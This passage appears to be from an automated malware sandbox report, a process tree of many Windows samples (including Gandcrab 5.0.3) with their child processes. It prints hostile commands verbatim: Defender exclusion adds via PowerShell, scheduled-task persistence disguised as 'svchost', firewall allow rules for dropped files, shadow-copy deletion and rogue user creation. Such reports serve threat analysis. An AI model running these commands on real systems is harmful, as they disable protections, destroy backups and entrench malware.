        "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
        5⤵
        
        PID:5476
      - C:\Windows\apppatch\ja-JP\sppsvc.exe
        
        "C:\Windows\apppatch\ja-JP\sppsvc.exe"
        6⤵
        
        PID:6208
  - - C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
      "C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"
      4⤵
      PID:5028
  - - C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
      "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
      4⤵
      PID:5700
    - - C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
        
        "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
        5⤵
        
        PID:6744
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 412
        6⤵
        Program crash
        
        PID:6740
  - - C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe
      "C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"
      4⤵
      PID:3584
    - - C:\Windows\winhlp32.exe
        
        winhlp32.exe -x
        5⤵
        
        PID:6088
    - - C:\Windows\winhlp32.exe
        
        winhlp32.exe -x
        5⤵
        
        PID:1184
  - - C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
      "C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
      4⤵
      PID:4992
  - - C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe
      "C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"
      4⤵
      PID:5660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\netsh.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Temp\SearchApp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\firefox.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\TextInputHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6452
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8XCshiEur1.bat"
        5⤵
        
        PID:6716
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7784
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5544
  - - C:\Program Files (x86)\BTZ.exe
      "C:\Program Files (x86)\BTZ.exe"
      4⤵
      PID:2148
  - - C:\Program Files (x86)\Cat.exe
      "C:\Program Files (x86)\Cat.exe"
      4⤵
      PID:2936
  - - C:\Program Files (x86)\Client.exe
      "C:\Program Files (x86)\Client.exe"
      4⤵
      PID:1684
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
        5⤵
        
        PID:7084
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
        6⤵
        
        PID:7768
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
        5⤵
        
        PID:5368
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
        6⤵
        
        PID:6208
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
        5⤵
        
        PID:7724
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4412
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
        5⤵
        
        PID:6060
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
        6⤵
        
        PID:7576
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
        5⤵
        
        PID:6680
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7564
  - - C:\Program Files (x86)\Darkest Dungeon setub.exe
      "C:\Program Files (x86)\Darkest Dungeon setub.exe"
      4⤵
      PID:5228
    - - C:\Users\Admin\AppData\Roaming\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost.exe"
        5⤵
        
        PID:3160
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svhost.exe" "svhost.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:7284
  - - C:\Program Files (x86)\evil.exe
      "C:\Program Files (x86)\evil.exe"
      4⤵
      PID:852
    - - C:\Users\Admin\AppData\Local\Temp\evil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\evil.exe"
        5⤵
        
        PID:6844
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6960
  - - C:\Program Files (x86)\fwclt.exe
      "C:\Program Files (x86)\fwclt.exe"
      4⤵
      PID:5416
  - - C:\Program Files (x86)\Gandcrab5.0.3.exe
      "C:\Program Files (x86)\Gandcrab5.0.3.exe"
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\System32\wermgr.exe"
        5⤵
        
        PID:5612
      - C:\Windows\SysWOW64\wbem\wmic.exe
        
        "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
        6⤵
        
        PID:7932
  - - C:\Program Files (x86)\Happy18.exe
      "C:\Program Files (x86)\Happy18.exe"
      4⤵
      PID:4044
  - - C:\Program Files (x86)\kosomk.exe
      "C:\Program Files (x86)\kosomk.exe"
      4⤵
      PID:3104
    - - C:\Users\Admin\AppData\Roaming\dicsord.exe
        
        "C:\Users\Admin\AppData\Roaming\dicsord.exe"
        5⤵
        
        PID:7024
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\dicsord.exe" "dicsord.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6280
  - - C:\Program Files (x86)\LightNeuronX0.exe
      "C:\Program Files (x86)\LightNeuronX0.exe"
      4⤵
      PID:2488
  - - C:\Program Files (x86)\malecus.exe
      "C:\Program Files (x86)\malecus.exe"
      4⤵
      PID:4028
  - - C:\Program Files (x86)\see7.exe
      "C:\Program Files (x86)\see7.exe"
      4⤵
      PID:5676
    - - C:\Program Files (x86)\see7.exe
        
        "C:\Program Files (x86)\see7.exe"
        5⤵
        
        PID:7156
      - C:\Windows\SysWOW64\autoconv.exe
        
        "C:\Windows\SysWOW64\autoconv.exe"
        6⤵
        
        PID:3612
      - C:\Windows\SysWOW64\chkdsk.exe
        
        "C:\Windows\SysWOW64\chkdsk.exe"
        6⤵
        
        PID:6768
  - - C:\Program Files (x86)\TEST.exe
      "C:\Program Files (x86)\TEST.exe"
      4⤵
      PID:3780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp60DE.tmp.bat""
        5⤵
        
        PID:6464
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:4596
      - C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
        
        "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
        6⤵
        
        PID:6076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\touhou virus.bat" "
      4⤵
      PID:2224
    - - C:\Windows\SysWOW64\net.exe
        
        net user Shanghai /add
        5⤵
        
        PID:6464
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Shanghai /add
        6⤵
        
        PID:7072
    - - C:\Windows\SysWOW64\net.exe
        
        net user Bad Apple /add
        5⤵
        
        PID:2304
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Bad Apple /add
        6⤵
        
        PID:7792
    - - C:\Windows\SysWOW64\net.exe
        
        net user Marisa
        5⤵
        
        PID:3908
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Marisa
        6⤵
        
        PID:7544
    - - C:\Windows\SysWOW64\net.exe
        
        net user Reimu /add
        5⤵
        
        PID:5584
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Reimu /add
        6⤵
        
        PID:7452
    - - C:\Windows\SysWOW64\mountvol.exe
        
        mountvol X:\ /d
        5⤵
        
        PID:7540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=PTt19B5_V3I
        5⤵
        
        PID:6632
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc188446f8,0x7ffc18844708,0x7ffc18844718
        6⤵
        
        PID:7228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=tpedaZ0_yyQ
        5⤵
        
        PID:7564
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffc188446f8,0x7ffc18844708,0x7ffc18844718
        6⤵
        
        PID:932
    - - C:\Windows\SysWOW64\diskpart.exe
        
        diskpart
        5⤵
        
        PID:5172
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer
        5⤵
        
        PID:3008
  - - C:\Program Files (x86)\vbc.exe
      "C:\Program Files (x86)\vbc.exe"
      4⤵
      PID:5364
    - - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
        
        C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
        5⤵
        
        PID:4784
      - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
        
        C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
        6⤵
        
        PID:2248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 592
        6⤵
        Program crash
        
        PID:6604
  - - C:\Program Files (x86)\virus.jk.exe
      "C:\Program Files (x86)\virus.jk.exe"
      4⤵
      PID:5988
    - - C:\Program Files (x86)\virus.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.exe"
        5⤵
        
        PID:6768
      - C:\Program Files (x86)\virus.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.exe"
        6⤵
        
        PID:6168
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.exe"
        7⤵
        
        PID:6560
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe"
        8⤵
        
        PID:6412
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe"
        9⤵
        
        PID:6292
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe"
        10⤵
        
        PID:3040
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        11⤵
        
        PID:6812
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        12⤵
        
        PID:7304
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        13⤵
        
        PID:2764
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        14⤵
        
        PID:7300
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        15⤵
        
        PID:7512
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        16⤵
        
        PID:7012
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        17⤵
        
        PID:7952
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        18⤵
        
        PID:6416
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        19⤵
        
        PID:7640
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        20⤵
        
        PID:6432
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        21⤵
        
        PID:6156
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        22⤵
        
        PID:4816
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        23⤵
        
        PID:7776
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        24⤵
        
        PID:3232
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        25⤵
        
        PID:7544
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        26⤵
        
        PID:7520
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        27⤵
        
        PID:6480
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        28⤵
        
        PID:6800
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        29⤵
        
        PID:7316
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        30⤵
        
        PID:4856
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        31⤵
        
        PID:6672
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        32⤵
        
        PID:6080
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        33⤵
        
        PID:6432
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        34⤵
        
        PID:3584
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        35⤵
        
        PID:2744
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        36⤵
        
        PID:7804
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        37⤵
        
        PID:6908
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        38⤵
        
        PID:7100
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        39⤵
        
        PID:3612
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        40⤵
        
        PID:4156
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        41⤵
        
        PID:3128
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        42⤵
        
        PID:6464
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        43⤵
        
        PID:2148
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        44⤵
        
        PID:5480
        
